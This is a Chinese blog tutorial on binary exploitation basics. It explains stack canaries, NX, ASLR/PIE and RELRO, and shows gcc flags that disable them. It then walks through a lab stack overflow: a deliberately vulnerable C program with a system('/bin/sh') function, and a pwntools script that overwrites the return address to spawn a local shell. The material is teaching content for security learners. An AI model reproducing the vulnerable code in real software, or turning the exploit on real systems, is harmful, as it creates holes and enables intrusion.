<!DOCTYPE html><html lang="[&quot;zh-CN&quot;,&quot;en&quot;,&quot;default&quot;]"><head><meta charset="UTF-8"><meta http-equiv="X-UA-Compatible" content="IE=edge"><meta name="viewport" content="width=device-width, initial-scale=1"><meta name="format-detection" content="telephone=no"><meta name="apple-mobile-web-app-capable" content="yes"><meta name="apple-mobile-web-app-status-bar-style" content="black"><link rel="icon" href="/images/tb.jpg?v=2.6.2" type="image/png" sizes="16x16"><link rel="icon" href="/images/tb.jpg?v=2.6.2" type="image/png" sizes="32x32"><link rel="apple-touch-icon" href="/images/tb.jpg?v=2.6.2" sizes="180x180"><meta name="description" content="操作系统提供了许多安全机制来尝试降低或阻止缓冲区溢出攻击带来的安全风险，包括DEP、ASLR等。">
<meta property="og:type" content="article">
<meta property="og:title" content="02. 保护概念和栈溢出实例">
<meta property="og:url" content="https://unique-elven.github.io/2022/11/08/pwn002/index.html">
<meta property="og:site_name" content="乙太">
<meta property="og:description" content="操作系统提供了许多安全机制来尝试降低或阻止缓冲区溢出攻击带来的安全风险，包括DEP、ASLR等。">
<meta property="og:locale" content="zh_CN">
<meta property="og:image" content="https://unique-elven.github.io/2022/11/08/pwn002/pwn01.png">
<meta property="og:image" content="https://unique-elven.github.io/2022/11/08/pwn002/pwn02.png">
<meta property="og:image" content="https://unique-elven.github.io/2022/11/08/pwn002/pwn03.png">
<meta property="og:image" content="https://unique-elven.github.io/2022/11/08/pwn002/pwn04.png">
<meta property="og:image" content="https://unique-elven.github.io/2022/11/08/pwn002/pwn05.png">
<meta property="og:image" content="https://unique-elven.github.io/2022/11/08/pwn002/pwn06.png">
<meta property="og:image" content="https://unique-elven.github.io/2022/11/08/pwn002/pwn07.png">
<meta property="article:published_time" content="2022-11-08T13:49:13.000Z">
<meta property="article:modified_time" content="2023-05-01T08:22:18.380Z">
<meta property="article:author" content="乙太">
<meta property="article:tag" content="PWN">
<meta property="article:tag" content="02 PWN基础知识">
<meta name="twitter:card" content="summary">
<meta name="twitter:image" content="https://unique-elven.github.io/2022/11/08/pwn002/pwn01.png"><title>02. 保护概念和栈溢出实例 | 乙太</title><link ref="canonical" href="https://unique-elven.github.io/2022/11/08/pwn002/"><link rel="alternate" href="/atom.xml" type="application/atom+xml"><link rel="dns-prefetch" href="https://cdn.jsdelivr.net"><link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/@fortawesome/fontawesome-free@5.12.1/css/all.min.css" type="text/css"><link rel="stylesheet" href="/css/index.css?v=2.6.2"><link rel="dns-prefetch" href="https://hm.baidu.com"><script src="/live2d-widget/autoload.js"></script><script>var _hmt = _hmt || [];
(function() {
  var hm = document.createElement('script');
  hm.src = 'https://hm.baidu.com/hm.js?f044c58249290639d0e8a63276ebca36';
  hm.async = true;

  if (false) {
    hm.setAttribute('data-pjax', '');
  }
  var s = document.getElementsByTagName('script')[0]; 
  s.parentNode.insertBefore(hm, s);
})();</script><script>var Stun = window.Stun || {};
var CONFIG = {
  root: '/',
  algolia: undefined,
  assistSearch: undefined,
  fontIcon: {"prompt":{"success":"fas fa-check-circle","info":"fas fa-arrow-circle-right","warning":"fas fa-exclamation-circle","error":"fas fa-times-circle"},"copyBtn":"fas fa-copy"},
  sidebar: {"offsetTop":"20px","tocMaxDepth":6},
  header: {"enable":true,"showOnPost":true,"scrollDownIcon":false},
  postWidget: {"endText":true},
  nightMode: {"enable":true},
  back2top: {"enable":true},
  codeblock: {"style":"default","highlight":"light","wordWrap":false},
  reward: true,
  fancybox: false,
  zoomImage: {"gapAside":"20px"},
  galleryWaterfall: undefined,
  lazyload: false,
  pjax: undefined,
  externalLink: {"icon":{"enable":true,"name":"fas fa-external-link-alt"}},
  shortcuts: undefined,
  prompt: {"copyButton":"复制","copySuccess":"复制成功","copyError":"复制失败"},
  sourcePath: {"js":"js","css":"css","images":"images"},
};

window.CONFIG = CONFIG;</script><meta name="generator" content="Hexo 6.0.0"></head><body><div class="container" id="container"><header class="header" id="header"><div class="header-inner"><nav class="header-nav header-nav--fixed"><div class="header-nav-inner"><div class="header-nav-menubtn"><i class="fas fa-bars"></i></div><div class="header-nav-menu"><div class="header-nav-menu-item"><a class="header-nav-menu-item__link" href="/"><span class="header-nav-menu-item__icon"><i class="fas fa-home"></i></span><span class="header-nav-menu-item__text">首页</span></a></div><div class="header-nav-menu-item"><a class="header-nav-menu-item__link" href="/archives/"><span class="header-nav-menu-item__icon"><i class="fas fa-folder-open"></i></span><span class="header-nav-menu-item__text">归档</span></a></div><div class="header-nav-menu-item"><a class="header-nav-menu-item__link" href="/categories/"><span class="header-nav-menu-item__icon"><i class="fas fa-layer-group"></i></span><span class="header-nav-menu-item__text">分类</span></a></div><div class="header-nav-menu-item"><a class="header-nav-menu-item__link" href="/tags/"><span class="header-nav-menu-item__icon"><i class="fas fa-tags"></i></span><span class="header-nav-menu-item__text">标签</span></a></div></div><div class="header-nav-search"><span class="header-nav-search__icon"><i class="fas fa-search"></i></span><span class="header-nav-search__text">搜索</span></div><div class="header-nav-mode"><div class="mode"><div class="mode-track"><span class="mode-track-moon"></span><span class="mode-track-sun"></span></div><div class="mode-thumb"></div></div></div></div></nav><div class="header-banner"><div class="header-banner-info"><div class="header-banner-info__title">乙太</div><div class="header-banner-info__subtitle">乙太</div></div></div></div></header><main class="main" id="main"><div class="main-inner"><div class="content-wrap" id="content-wrap"><div class="content" id="content"><!-- Just used to judge whether it is an article page--><div id="is-post"></div><div class="post"><header class="post-header"><h1 class="post-title">02. 保护概念和栈溢出实例</h1><div class="post-meta"><span class="post-meta-item post-meta-item--createtime"><span class="post-meta-item__icon"><i class="far fa-calendar-plus"></i></span><span class="post-meta-item__info">发表于</span><span class="post-meta-item__value">2022-11-08 21:49:13</span></span><span class="post-meta-item post-meta-item--updatetime"><span class="post-meta-item__icon"><i class="far fa-calendar-check"></i></span><span class="post-meta-item__info">更新于</span><span class="post-meta-item__value">2023-05-01 16:22:18</span></span><span class="post-meta-item post-meta-item--visitors"><span class="post-meta-item__icon"><i class="fas fa-eye"></i></span><span class="post-meta-item__info">阅读次数</span><span class="post-meta-item__value" id="busuanzi_value_page_pv"></span></span></div></header><div class="post-body">
        <h1 id="一-常见的保护">
          <a href="#一-常见的保护" class="heading-link"><i class="fas fa-link"></i></a><a href="#一-常见的保护" class="headerlink" title="一.常见的保护"></a>一.常见的保护</h1>
      <pre><code>操作系统提供了许多安全机制来尝试降低或阻止缓冲区溢出攻击带来的安全风险，包括DEP、ASLR等。在编写漏洞利用代码的时候，需要特别注意目标进程是否开启了DEP（Linux下对应NX）、ASLR(Linux下对应PIE)等机制，例如存在DEP(NX)的话就不能执行栈上地数据，存在ASLR的话各个系统调用的就是随机变化的。
</code></pre>
<ol>
<li>CANARY (栈保护)<br>  这个选项表示栈保护功能是否开启</li>
</ol>
<pre><code>栈溢出保护是一种缓冲区溢出攻击缓冲手段，当函数存在缓冲区溢出攻击漏洞时，攻击者可以覆盖栈上的返回地址来让shsellcode能够得到执行。当启用栈保护后，函数开始执行的时候会先往栈里插入cookie信息，当函数真正返回的时候会验证cookie信息是否合法，如果不合法就会停止程序运行。攻击者在覆盖返回地址的时候往往也会将cookie信息覆盖掉，导致栈保护检查失败而阻止shellcode的执行。在Linux中我们将cookie信息称为canary。
</code></pre>
<ol start="2">
<li><p>FORTIFY<br> 也是防止缓冲区溢出攻击，新颖少见</p>
</li>
<li><p>NX（DEP）<br> NX即No-eXecute（不可执行），基本原理即将数据所在内存页标识为不可执行·，当程序溢出成功转入shellocode时，程序会尝试在数据页面上执行指令，此时CPU就会抛出异常，而不是去执行恶意指令。</p>
</li>
<li><p>PIE（ASLR）<br> 一般情况下NX（Windows上称为DEP）和地址空间分布随机化（ASLR）会同时工作。<br> 内存地址随机化机制（address sapace layout randomizatuion）,有以下三种情况<br>0–表示关闭进程地址空间随机变化<br>1–表示将mmap的基址，stack和vdso页面随机变化<br>2–表示在1的基础上增加栈（heap）的随机变<br> 可以防范基于Ret21ibc方式的针对DEP的攻击。ASLR和DEP配合使用，能有效阻止攻击者在堆栈上运行恶意代码。</p>
</li>
</ol>
<p>5.RELPO<br>    设置符号重定向表格为只读或在程序启动时就解析并绑定所有动态符号，从而减少对GOT（Global Offset Table）攻击。RELRO为“Partial RELRO”, 说明我们对GOT表具有写权限。</p>
<hr>

        <h1 id="二-Linux检查保护情况">
          <a href="#二-Linux检查保护情况" class="heading-link"><i class="fas fa-link"></i></a><a href="#二-Linux检查保护情况" class="headerlink" title="二. Linux检查保护情况"></a>二. Linux检查保护情况</h1>
      <p>命令：checksec 文件名<br>注意：要以root权限执行<br>要在该文件目录下执行：</p>
<p><img src="/2022/11/08/pwn002/pwn01.png" alt="图片"></p>
<p>解读查询结构：i386架构，32位，little是小端存储<br>partial RELR0<br>Carry found<br>NX enabled<br>以上开启了三种保护<br>NO PIE 没开启地址随机变换</p>
<hr>

        <h1 id="三-关闭保护">
          <a href="#三-关闭保护" class="heading-link"><i class="fas fa-link"></i></a><a href="#三-关闭保护" class="headerlink" title="三. 关闭保护"></a>三. 关闭保护</h1>
      <figure class="highlight plaintext"><div class="table-container"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">命令：gcc -no-pie -fno-stack-protector -z execstack -m32 -o read read.c</span><br></pre></td></tr></table></div></figure>
<p>再查看：</p>
<p><img src="/2022/11/08/pwn002/pwn02.png" alt="图片"></p>
<hr>

        <h1 id="四-查看程序使用了哪些函数">
          <a href="#四-查看程序使用了哪些函数" class="heading-link"><i class="fas fa-link"></i></a><a href="#四-查看程序使用了哪些函数" class="headerlink" title="四. 查看程序使用了哪些函数"></a>四. 查看程序使用了哪些函数</h1>
      <p>命令：objdump 是查看目标文件或者可执行的目标文件的构成的gcc工具。<br>详情：<span class="exturl"><a class="exturl__link" target="_blank" rel="noopener" href="https://man.linuxde.net/objdump">https://man.linuxde.net/objdump</a><span class="exturl__icon"><i class="fas fa-external-link-alt"></i></span></span></p>
<figure class="highlight c"><div class="table-container"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">-j name    仅仅显示指定名称为name的section的信息</span><br><span class="line">-t              显示文件的符号表入口</span><br><span class="line">objdump -t -j .text read                 <span class="comment">//查看已经编译的read程序的.text段有哪些函数</span></span><br></pre></td></tr></table></div></figure>
<p><img src="/2022/11/08/pwn002/pwn03.png" alt="图片"></p>
<hr>

        <h1 id="五-实战演练">
          <a href="#五-实战演练" class="heading-link"><i class="fas fa-link"></i></a><a href="#五-实战演练" class="headerlink" title="五. 实战演练"></a>五. 实战演练</h1>
      
        <h2 id="1-源码">
          <a href="#1-源码" class="heading-link"><i class="fas fa-link"></i></a><a href="#1-源码" class="headerlink" title="1. 源码"></a>1. 源码</h2>
      <p>首先用上一次的方法，编写一个 .c 文件，源代码：</p>
<figure class="highlight c"><div class="table-container"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">#<span class="keyword">include</span><span class="string">&lt;stdio.h&gt;</span></span></span><br><span class="line"><span class="type">void</span> <span class="title function_">exploit</span><span class="params">()</span></span><br><span class="line">&#123;</span><br><span class="line">    system(<span class="string">&quot;/bin/sh&quot;</span>);</span><br><span class="line">&#125;</span><br><span class="line"><span class="type">void</span> <span class="title function_">func</span><span class="params">()</span></span><br><span class="line">&#123;</span><br><span class="line">    <span class="type">char</span> str[<span class="number">0x20</span>];</span><br><span class="line">    read(<span class="number">0</span>, str, <span class="number">0x50</span>);             </span><br><span class="line">&#125;</span><br><span class="line"><span class="type">int</span> <span class="title function_">main</span><span class="params">()</span></span><br><span class="line">&#123;</span><br><span class="line">    func();</span><br><span class="line">    <span class="keyword">return</span> <span class="number">0</span>;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></div></figure>
<p>然后编译，同时也需要关闭保护，然后查看保护，如上命令！</p>
<figure class="highlight plaintext"><div class="table-container"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">记得权限：chmod 777 read</span><br></pre></td></tr></table></div></figure>
<p>可见函数func()里面实现的功能就是可以从command line读取0x50的字符串，放入空间为0x20的字符串数组，显然会超出范围，就会发生堆栈溢出!</p>
<hr>

        <h2 id="2-函数解释：">
          <a href="#2-函数解释：" class="heading-link"><i class="fas fa-link"></i></a><a href="#2-函数解释：" class="headerlink" title="2. 函数解释："></a>2. 函数解释：</h2>
      <p>** read()               用于将文件描述符对应的文件中读取数据 **</p>
<figure class="highlight c"><div class="table-container"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br></pre></td><td class="code"><pre><span class="line"><span class="type">ssize_t</span> <span class="title function_">read</span><span class="params">(<span class="type">int</span> fd,<span class="type">void</span>*buf,<span class="type">size_t</span> count)</span></span><br><span class="line">参数说明：</span><br><span class="line">fd: 是文件描述符, 从command line获取数据时，为0</span><br><span class="line">buf: 为读出数据的缓冲区；</span><br><span class="line">count: 为每次读取的字节数（是请求读取的字节数，读上来的数据保</span><br><span class="line">存在缓冲区buf中，同时文件的当前读写位置向后移）</span><br><span class="line">返回值：</span><br><span class="line">成功：返回读出的字节数</span><br><span class="line">失败：返回-1，并设置errno，如果在调用read</span><br><span class="line">之前到达文件末尾，则这次read返回0</span><br></pre></td></tr></table></div></figure>


<p>** write()             用于将数据写入到文件描述符对应的文件，原型：**</p>
<figure class="highlight c"><div class="table-container"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line"><span class="type">ssize_t</span> <span class="title function_">write</span><span class="params">(<span class="type">int</span> fd,<span class="type">const</span> <span class="type">void</span>*buf,<span class="type">size_t</span> count)</span>;</span><br><span class="line">参数说明：</span><br><span class="line">fd:是文件描述符（输出到command line，就是<span class="number">1</span>）</span><br><span class="line">buf:通常是一个字符串，需要写入的字符串</span><br><span class="line">count：是每次写入的字节数</span><br></pre></td></tr></table></div></figure>
<p>** 返回值：**</p>
<figure class="highlight plaintext"><div class="table-container"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">成功：返回写入的字节数</span><br><span class="line">失败：返回-1并设置errno</span><br><span class="line">ps： 写常规文件时，write的返回值通常等于请求写的字节</span><br><span class="line">数count， 而向终端设备或者网络写时则不一定</span><br></pre></td></tr></table></div></figure>
<p>command line相当于windows控制台窗口！</p>
<hr>

        <h2 id="3-查看程序段函数：">
          <a href="#3-查看程序段函数：" class="heading-link"><i class="fas fa-link"></i></a><a href="#3-查看程序段函数：" class="headerlink" title="3.查看程序段函数："></a>3.查看程序段函数：</h2>
      <p> <img src="/2022/11/08/pwn002/pwn04.png" alt="图片"><br>可见这里对应了源代码的程序，一目了然。这种方式只是适合简单程序查看，复杂的还是使用IDA</p>
<p>分析：<br>这里我们就重点关注func()的汇编代码：<br>gdb read        &#x2F;&#x2F;运行gdb<br>disass func       &#x2F;&#x2F;查看汇编代码</p>
<p>前两+0和+1行生成栈帧，巩固leave 和 enter</p>
<figure class="highlight plaintext"><div class="table-container"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">enter有时在函数开头，正好相反,相当于：</span><br><span class="line">push ebp</span><br><span class="line">mov ebp,esp</span><br></pre></td></tr></table></div></figure>
<p>+3行保存当前的ebp地址<br>+4行减小0x24申请36字节的空间，也就esp上升9行<br>+7和+12是调试器自动加的获取动态地址，不在程序内，先不管<br>+17再在堆栈申请4个字节空间，减小0x4，esp上升一行<br>+20把read()函数的第三个参数0x50压栈<br>+22把ebp-0x28的地址保存到edx<br>+25把ebp的值压栈，也就是把ebp-0x28的地址压栈。很有可能是一个结构体<br>+26把read函数第一个参数0x0压栈<br>&#x2F;&#x2F;为什么参数会从右向左压栈？因为C语言函数调用约定_cdecl<br>+30和+35就是调用read()函数了，和外平栈<br>后面就是恢复了</p>
<p>看堆栈图：</p>
<div class="table-container"><table>
<thead>
<tr>
<th>堆栈地址</th>
<th>堆栈数据</th>
</tr>
</thead>
<tbody><tr>
<td>0x28这里代表十行省略</td>
<td>数据</td>
</tr>
</tbody></table></div>
<pre><code>|保存原ebp地址
</code></pre>
<p>ret    |保存返回地址数据</p>
<p>如果程序要执行exploit函数，那么要把这个函数的入口地址覆盖保存到ret</p>
<p>所以我们首先要找下exploit()函数的入口地址：disass exploit<br> <img src="/2022/11/08/pwn002/pwn05.png" alt="图片"><br>0x08048456</p>
<hr>

        <h2 id="4-写exp">
          <a href="#4-写exp" class="heading-link"><i class="fas fa-link"></i></a><a href="#4-写exp" class="headerlink" title="4.写exp:"></a>4.写exp:</h2>
      <p>老方法，用vi编辑器：vi exp.py</p>
<p>代码内容：</p>
<figure class="highlight python"><div class="table-container"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">from</span> pwn <span class="keyword">import</span> *    <span class="comment">#导入pwn包</span></span><br><span class="line">p=process(<span class="string">&quot;./read&quot;</span>)    <span class="comment">#指定目录创建进程</span></span><br><span class="line">offset = <span class="number">0x28</span> + <span class="number">0x4</span>    <span class="comment">#设置偏移量</span></span><br><span class="line">payload = <span class="string">&#x27;a&#x27;</span>*offset + p32(<span class="number">0x08048456</span>)</span><br><span class="line"><span class="comment">#用垃圾值a填充覆盖堆栈中offset行的数据,用32位的地址数据覆盖ret</span></span><br><span class="line">p.sendline(payload)     <span class="comment">#发送数据</span></span><br><span class="line">p.interactive()       <span class="comment">#获取运行时的环境</span></span><br></pre></td></tr></table></div></figure>
<figure class="highlight plaintext"><div class="table-container"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">保存    Esc  :wq </span><br><span class="line">权限：chmod 777 exp.py</span><br><span class="line">运行：python exp.py</span><br></pre></td></tr></table></div></figure>
<p> <img src="/2022/11/08/pwn002/pwn06.png" alt="图片"><br>可以看到$符号，所以我们就到了shell环境下！</p>
<p>然后我们就可以查看系统里面的东西了：<br> <img src="/2022/11/08/pwn002/pwn07.png" alt="图片"></p>
<p>but？？？我要怎么退出这个环境啊？<br>CTRL+C就退出了</p>
</div><footer class="post-footer"><div class="post-ending ending"><div class="ending__text">------ 本文结束，感谢您的阅读 ------</div></div><div class="post-copyright copyright"><div class="copyright-author"><span class="copyright-author__name">本文作者: </span><span class="copyright-author__value"><a href="https://unique-elven.github.io">乙太</a></span></div><div class="copyright-link"><span class="copyright-link__name">本文链接: </span><span class="copyright-link__value"><a href="https://unique-elven.github.io/2022/11/08/pwn002/">https://unique-elven.github.io/2022/11/08/pwn002/</a></span></div><div class="copyright-notice"><span class="copyright-notice__name">版权声明: </span><span class="copyright-notice__value">本博客所有文章除特别声明外，均采用 <a href="https://creativecommons.org/licenses/by-nc-sa/4.0/deed.en" rel="external nofollow" target="_blank">BY-NC-SA</a> 许可协议。转载请注明出处！</span></div></div><div class="post-tags"><span class="post-tags-item"><span class="post-tags-item__icon"><i class="fas fa-tag"></i></span><a class="post-tags-item__link" href="https://unique-elven.github.io/tags/PWN/">PWN</a></span><span class="post-tags-item"><span class="post-tags-item__icon"><i class="fas fa-tag"></i></span><a class="post-tags-item__link" href="https://unique-elven.github.io/tags/02-PWN%E5%9F%BA%E7%A1%80%E7%9F%A5%E8%AF%86/">02 PWN基础知识</a></span></div><div class="post-reward reward"><div class="reward-button">请我喝杯咖啡~</div><div class="reward-qrcode"><span class="reward-qrcode-alipay"><img class="reward-qrcode-alipay__img" src="/images/zhifubao.jpg"><div class="reward-qrcode-alipay__text">支付宝打赏</div></span><span class="reward-qrcode-wechat"><img class="reward-qrcode-wechat__img" src="/images/wechat.jpg"><div class="reward-qrcode-wechat__text">微信打赏</div></span></div></div><nav class="post-paginator paginator"><div class="paginator-prev"><a class="paginator-prev__link" href="/2023/02/20/pwn003/"><span class="paginator-prev__icon"><i class="fas fa-angle-left"></i></span><span class="paginator-prev__text">03. 远程PWN</span></a></div><div class="paginator-next"><a class="paginator-next__link" href="/2022/10/26/pwn001/"><span class="paginator-prev__text">01. PWN基础知识</span><span class="paginator-next__icon"><i class="fas fa-angle-right"></i></span></a></div></nav></footer></div></div><div class="comments" id="comments"><div id="lv-container" data-id="city" data-uid="MTAyMC81NjQ3My8zMjkzNg"></div></div></div><div class="sidebar-wrap" id="sidebar-wrap"><aside class="sidebar" id="sidebar"><div class="sidebar-nav"><span class="sidebar-nav-toc current">文章目录</span><span class="sidebar-nav-ov">站点概览</span></div><section class="sidebar-toc"><ol class="toc"><li class="toc-item toc-level-1"><a class="toc-link" href="#%E4%B8%80-%E5%B8%B8%E8%A7%81%E7%9A%84%E4%BF%9D%E6%8A%A4"><span class="toc-number">1.</span> <span class="toc-text">
          一.常见的保护</span></a></li><li class="toc-item toc-level-1"><a class="toc-link" href="#%E4%BA%8C-Linux%E6%A3%80%E6%9F%A5%E4%BF%9D%E6%8A%A4%E6%83%85%E5%86%B5"><span class="toc-number">2.</span> <span class="toc-text">
          二. Linux检查保护情况</span></a></li><li class="toc-item toc-level-1"><a class="toc-link" href="#%E4%B8%89-%E5%85%B3%E9%97%AD%E4%BF%9D%E6%8A%A4"><span class="toc-number">3.</span> <span class="toc-text">
          三. 关闭保护</span></a></li><li class="toc-item toc-level-1"><a class="toc-link" href="#%E5%9B%9B-%E6%9F%A5%E7%9C%8B%E7%A8%8B%E5%BA%8F%E4%BD%BF%E7%94%A8%E4%BA%86%E5%93%AA%E4%BA%9B%E5%87%BD%E6%95%B0"><span class="toc-number">4.</span> <span class="toc-text">
          四. 查看程序使用了哪些函数</span></a></li><li class="toc-item toc-level-1"><a class="toc-link" href="#%E4%BA%94-%E5%AE%9E%E6%88%98%E6%BC%94%E7%BB%83"><span class="toc-number">5.</span> <span class="toc-text">
          五. 实战演练</span></a><ol class="toc-child"><li class="toc-item toc-level-2"><a class="toc-link" href="#1-%E6%BA%90%E7%A0%81"><span class="toc-number">5.1.</span> <span class="toc-text">
          1. 源码</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#2-%E5%87%BD%E6%95%B0%E8%A7%A3%E9%87%8A%EF%BC%9A"><span class="toc-number">5.2.</span> <span class="toc-text">
          2. 函数解释：</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#3-%E6%9F%A5%E7%9C%8B%E7%A8%8B%E5%BA%8F%E6%AE%B5%E5%87%BD%E6%95%B0%EF%BC%9A"><span class="toc-number">5.3.</span> <span class="toc-text">
          3.查看程序段函数：</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#4-%E5%86%99exp"><span class="toc-number">5.4.</span> <span class="toc-text">
          4.写exp:</span></a></li></ol></li></ol></section><!-- ov = overview--><section class="sidebar-ov hide"><div class="sidebar-ov-author"><div class="sidebar-ov-author__avatar"><img class="sidebar-ov-author__avatar_img" src="/assets/avatar.jpg" alt="avatar"></div><p class="sidebar-ov-author__text">记得一键三连哦~</p></div><div class="sidebar-ov-social"><a class="sidebar-ov-social-item" href="https://github.com/unique-Elven" target="_blank" rel="noopener" data-popover="Github" data-popover-pos="up"><span class="sidebar-ov-social-item__icon"><i class="fab fa-github"></i></span></a><a class="sidebar-ov-social-item" href="https://space.bilibili.com/2098810443" target="_blank" rel="noopener" data-popover="Youtube" data-popover-pos="up"><span class="sidebar-ov-social-item__icon"><i class="fab fa-youtube"></i></span></a></div><div class="sidebar-ov-feed"><span class="sidebar-ov-feed-rss"><a class="sidebar-ov-feed-rss__link" href="/atom.xml" target="_blank" rel="noopener"><span class="sidebar-ov-feed-rss__icon"><i class="fas fa-rss"></i></span><span>RSS 订阅</span></a></span></div><div class="sidebar-ov-state"><a class="sidebar-ov-state-item sidebar-ov-state-item--posts" href="/archives/"><div class="sidebar-ov-state-item__count">10</div><div class="sidebar-ov-state-item__name">归档</div></a><a class="sidebar-ov-state-item sidebar-ov-state-item--categories" href="/categories/"><div class="sidebar-ov-state-item__count">14</div><div class="sidebar-ov-state-item__name">分类</div></a><a class="sidebar-ov-state-item sidebar-ov-state-item--tags" href="/tags/"><div class="sidebar-ov-state-item__count">14</div><div class="sidebar-ov-state-item__name">标签</div></a></div><div class="sidebar-ov-cc"><a href="https://creativecommons.org/licenses/by-nc-sa/4.0/deed.en" target="_blank" rel="noopener" data-popover="知识共享许可协议" data-popover-pos="up"><img src="/images/cc-by-nc-sa.svg"></a></div></section><div class="sidebar-reading"><div class="sidebar-reading-info"><span class="sidebar-reading-info__text">你已阅读了 </span><span class="sidebar-reading-info__num">0</span><span class="sidebar-reading-info__perc">%</span></div><div class="sidebar-reading-line"></div></div><html><head></head><body><iframe frameborder="no" border="0" marginwidth="0" marginheight="0" width=330 height=86 src="//music.163.com/outchain/player?type=2&id=436355381&auto=1&height=66">
</iframe>
<iframe frameborder="no" border="0" marginwidth="0" marginheight="0" width=330 height=86 src="//music.163.com/outchain/player?type=2&id=471589421&auto=0&height=66">
</iframe>
<iframe frameborder="no" border="0" marginwidth="0" marginheight="0" width=330 height=86 src="//music.163.com/outchain/player?type=2&id=1352045760&auto=0&height=66">
</iframe><p>    ❤ 网易云音乐提供支持——乙太 ❤</p><img src="https://ghchart.rshah.org/409ba5/unique-Elven" alt="unqique-Elven's Blue Github Chart" /><!-- hexo injector body_end start -->
  <script data-pjax src="https://npm.elemecdn.com/reverse-stu-allversions@1.0.1/butterfly/diy/hexo_githubcalendar.js"></script>
  <script data-pjax>
        function GithubCalendarConfig(){
            var git_githubapiurl ="https://python-github-calendar-api.vercel.app/api?uniuqe-Elven";
            var git_color =['#ebedf0', '#fdcdec', '#fc9bd9', '#fa6ac5', '#f838b2', '#f5089f', '#c4067e', '#92055e', '#540336', '#48022f', '#30021f'];
            var git_user ="uniuqe-Elven";
            var parent_div_git = document.getElementById('recent-posts');
            var git_div_html = '<div class="recent-post-item" style="width:100%;height:auto;padding:10px;"><div id="github_loading" style="width:10%;height:100%;margin:0 auto;display: block"><svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink"  viewBox="0 0 50 50" style="enable-background:new 0 0 50 50" xml:space="preserve"><path fill="#d0d0d0" d="M25.251,6.461c-10.318,0-18.683,8.365-18.683,18.683h4.068c0-8.071,6.543-14.615,14.615-14.615V6.461z" transform="rotate(275.098 25 25)"><animateTransform attributeType="xml" attributeName="transform" type="rotate" from="0 25 25" to="360 25 25" dur="0.6s" repeatCount="indefinite"></animateTransform></path></svg></div><div id="github_container"></div></div>';
            if(parent_div_git && location.pathname =='/'){
                console.log('已挂载github calendar')
                // parent_div_git.innerHTML=git_div_html+parent_div_git.innerHTML // 无报错，但不影响使用(支持pjax跳转)
                parent_div_git.insertAdjacentHTML("afterbegin",git_div_html) // 有报错，但不影响使用(支持pjax跳转)
            };
            GithubCalendar(git_githubapiurl,git_color,git_user)
        }
        if(document.getElementById('recent-posts')){
            GithubCalendarConfig()
        }
    </script>
    <style>#github_container{min-height:280px}@media screen and (max-width:650px) {#github_container{background-image:;min-height:0px}}</style>
    <style></style><!-- hexo injector body_end end --></body></html></aside></div><div class="clearfix"></div></div></main><footer class="footer" id="footer"><div class="footer-inner"><div><span>Copyright © 2023</span><span class="footer__icon"><i class="fas fa-heart"></i></span><span>乙太</span></div><div class="busuanzi"><span class="busuanzi-siteuv"><span class="busuanzi-siteuv__icon"><i class="fas fa-user"></i></span><span class="busuanzi-siteuv__info">访问人数</span><span class="busuanzi-siteuv__value" id="busuanzi_value_site_uv"></span></span><span class="busuanzi-sitepv"><span class="busuanzi-siteuv__icon"><i class="fas fa-eye"></i></span><span class="busuanzi-siteuv__info">浏览总量</span><span class="busuanzi-siteuv__value" id="busuanzi_value_site_pv"></span></span></div></div></footer><div class="loading-bar" id="loading-bar"><div class="loading-bar__progress"></div></div><div class="back2top" id="back2top"><span class="back2top__icon"><i class="fas fa-rocket"></i></span></div></div><div class="search-mask"></div><div class="search-popup"><span class="search-close"></span><div class="search-input"><input placeholder="搜索文章（支持多关键词，请用空格分隔）"></div><div class="search-results"></div></div><script src="https://cdn.jsdelivr.net/npm/jquery@v3.4.1/dist/jquery.min.js"></script><script src="https://cdn.jsdelivr.net/npm/velocity-animate@1.5.2/velocity.min.js"></script><script src="https://cdn.jsdelivr.net/npm/velocity-animate@1.5.2/velocity.ui.min.js"></script><script src="https://cdn.jsdelivr.net/npm/canvas-nest.js@1.0.1/dist/canvas-nest.min.js" color="0,255,255" opacity="0.6" count="199" zIndex="-1"></script><script>function initSearch() {
  var isXML = true;
  var search_path = 'search.json';

  if (!search_path) {
    search_path = 'search.xml';
  } else if (/json$/i.test(search_path)) {
    isXML = false;
  }

  var path = '/' + search_path;
  $.ajax({
    url: path,
    dataType: isXML ? 'xml' : 'json',
    async: true,
    success: function (res) {
      var datas = isXML ? $('entry', res).map(function () {
        // 将 XML 转为 JSON
        return {
          title: $('title', this).text(),
          content: $('content', this).text(),
